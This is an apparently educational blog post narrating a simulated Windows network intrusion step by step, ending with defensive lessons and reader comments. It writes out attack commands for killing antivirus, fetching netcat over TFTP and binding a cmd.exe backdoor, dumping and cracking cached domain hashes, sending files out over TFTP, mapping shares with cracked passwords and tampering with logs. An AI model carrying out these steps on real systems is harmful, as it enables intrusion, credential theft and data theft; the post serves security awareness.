Sunday, November 16, 2008

The Story of a Hack - Part 3. Kung Fu Shopping

Once again, this is just my little story about how some data may be stolen from a network following a penetration. This post is supposed to be educational and should demonstrate that these types on attacks are not rocket science that can be pulled of by an elite few. This post isn't really Kung Fu, I'll leave that to the brilliant Mr Skoudis. This is just a few DOS commands that show that you can get what you want without having to get a VNC of RDP session.

If you missed the intro, part one or part two you can get them here, here and here. These parts along with this one put together the story of my little hack. I hope you enjoy.

Kung Fu Shopping

Right, so I got on the LAN and I’ve had a little look around. Obviously I’m a lazy git so I’ll go for what I think will be the low hanging fruit, the Test Server. Names can give away so much. Often these are the servers that are just thrown onto a network and are maybe excluded from policies, they are not business critical and only used for testing so they are not patched because after all who’s gonna hack a test box eh? Well I am because that’s the type of box I like.

First I’m going to get a shell on the box with my trusty Metasploit. I saw from my scans that this is a Windows 2003 box with no service pack. I’ll therefore use the most reliable exploit I have MS06-040 (thank you Microsoft). There are newer exploits that could be used but this is a reliable favourite.

After gaining root (okay System) on the box I like to carefully and quietly look around to get a feel for where I am.

First things first, I want to stop any AV that might be running. So i'll just have a quick look for it.

Net Start

I hoped to see a service running, but nothing. Hmmm.. lets look at the tasks.


Oh, there it is. AVScanner.exe, never heard of that one before. I’ll kill it just to be sure. I don’t want anything messing with any tools I need to upload.

Taskkill /PID 1548

Before I continue it’s handy to get myself a backdoor just encase I drop the Metasploit session. I’ll use Netcat for this. I copy it up to the temp folder, then start a listener on another port.

tftp –i get nc.exe

nc –L –e cmd.exe –p 33333

Okay, now I connect to my backdoor.

nc 33333

Cool. Now I want to get myself another session on the go and get the fantastic Meterpreter going.

Right, I want to dump out anything that needs cracking first so it can be cracked whilst I poke about. Meterpreter lets dump the local hashes.


Now that’s all well and good, these are nice to have but I really need so domain credentials. For this I’ll use Cachedump.


Ohh, nice. I got me 2 domain user hashes. No admin but that’s okay. I’ll throw these through John with a good wordlist and carry on.

john --wordlist=pwlist.lst --format=mscash cc.txt

One thing I realise is that these are going to be cracked and come back in uppercase so ideally I want to know the password policy so I don’t start locking people out.

Net accounts

There we go, nice relaxed password policies. No biscuit for Bad Admin!

Right, lets get a bit of info on the host and the network. As I go through these commands I like to pipe them out to a file and then periodically copy the file over to my box. This way I have a load more valuable information if I need to re-enter the network at a later time. I still have my nmap scans from earlier, I'll only get rid of stuff after I have what I came for.

So I get the useful network stuff:

Ipconfig /all

arp -a

Ipconfig /displaydns

This gives me the IP info and lets me know who this box has been talking to recently.

I also want to know what about the other hosts on the domain.

Net view

Right, so there’s the file server. I guess the stuff I want is going to be on there. Hang on, lets not be too hasty. I need to have a look around here first. What else have I got on this box? I'll just rip through the directories with tree then TFTP the file upto my box for easier analysis.

tree c:\ /f /a >filelist.txt

tftp put filelist.txt

Look at that, a backup database file. I’ll have that. I just love the way that people make copies of data and protect those copies so much less than they do the originals.

And some very useful SysInternal tools. Good Admin, you can have that biscuit after all.

So are there any other databases I’ve missed? After all Tree wont pick up hidden files.

Dir /s /h:a *.*

Oh, would you believe it, a hidden password file. It just goes to show what goodies you might find.

type db-pass.txt

Right, lets crack on, the pub opens soon. What am I here for? Accounts database and Customer database. Well they might be in the backup, but I don’t want to take the chance.

Do I have any mapped drives to the server?

Net use

No mapped drives, well lets get one on. First what do I want to map to?

Net view \\File-Server

I can see a data share, I’ll map to that and hopefully be able to grab my data and get out of here.

Net use * \\file-server\data

Tree/f /a

Right, well it seems that the folders are locked down with ACL’s.

John has finished on the wordlist so I’ll see what we have. Well I have one account cracked. Hopefully that’ll do the trick.

Net use * \\File-Server\Data Screwy0u /U:lee

Right I can get into Customer Care and after a second or two I get my customer database.

And it's gone! i should have been a magician!

That’s no good. I’m locked out of Accounts though through even more NTFS permissions. I think I need to kick John up the arse and get these passwords cracked. I throw a bigger dictionary at him and enable the rules.

john --wordlist=bigpwlist.lst --rules --format=mscash cc2.txt

Right, now I got a BackupSVC account. Well if my memory serves me well, my recon found that HackMe was listed as a customer of Backup Service, the outsourcing company. Let’s see what groups this account is in, I guess if they are gonna have a support account it's gonna have some decent privileges right?

Net group “accounts” /domain

Net group “domain admins” /domain

Only Maria is in the accounts group, but I did get an account in Domain Admins. Although I can’t see if Domain Admins is a member of Accounts, if not I can always use PWDump to grab AD and then crack Maria’s password.

Right now I’ll just remap my drive with the good old BackupSVC account, hopefully grab my data and be on my merry way.

So. I have my data. I need to do some tidying up. I’ll overwrite and rename the tools I uploaded before deleting them. I also want to remove any shares I created. I know that I would have left some traces but i'll feel a little better about myself after tidying up. i might also use the Time command to make things slightly more interesting for Mr Admin.

And finally I’ll use the handy tools that I found on the test box to delete the logs on the File Server and the Demo Server.

Psloglist \\file-server –u hackme\BackupSVC –p Support01 –c System Psloglist \\file-server –u hackme\BackupSVC –p Support01 –c Application Psloglist \\file-server –u hackme\BackupSVC –p Support01 –c Security

Right, I’ve got what I wanted, and now I’m outta here.


  • First lesson, Patch. Patch everything, and once you have finished patching, patch some more.
  • Passwords. A good strong password policy that requires passwords to be complex and changed regularly. Also a password audit passwords would have picked up a very weak password on a privileged account such as BackupSVC
  • Good account policies should be enforced, locking accounts until they are required.
  • Enforce NTFS permissions to lock down access to files, giving access to only those that really need access.
  • Good AV software could have prevented some of the tools I uploaded from working, yes I may have been able to modify these tools but it makes the task of the attacker that much harder.
  • Check logs regularly and have an incident response plan to deal with a security breach.
That's about it really, there probably are loads more steps that can be done such as employing HIDs and HIPs but i'm not really all that well up on those yet.

Thanks for reading.


KP said...

Really enjoyed this series. It was very interesting and educational. Thanks for posting it!

blad3 said...

Yes, thanks for posting.
Valuable information.

SynJunkie said...

Thanks for the feedback guys.

Mike said...


GREAT write up. I made all our admins read it.

Thanks a lot.

Clay said...

Great posts.

CG said...

nice post, i'm sure you'll cover it in another post but if you've already got your meterpreter shell you can use the incognito stuff to token steal instead of uploading cachedump and cracking offline.

you may also want to take a look at some of the hash passing tools if you're internal.


SynJunkie said...

Thanks for the feedback Chris. I'm definately wanting to to learn more about Metasploit. After hearing the latest PDC episode I'll be upgrading to 3.2 and be getting to grips with it sooner rather than later I hope.

Anonymous said...

I just love your stories! Keep up the excellent work. Looking forward to reading more from you.

Henke, Sweden

George said...

Great story Syn! Loved it! Learned alot ;)
One question, how does the tftp command know where to find nc.exe when you launched it from the remote machine?

SynJunkie said...

Goerge, glad you learned something.

In answer to your question, that's all in the set up of the TFTP Server that you run. Some allow you to specify a directory and other just use the directory from where you launch the command.

Hope that helps.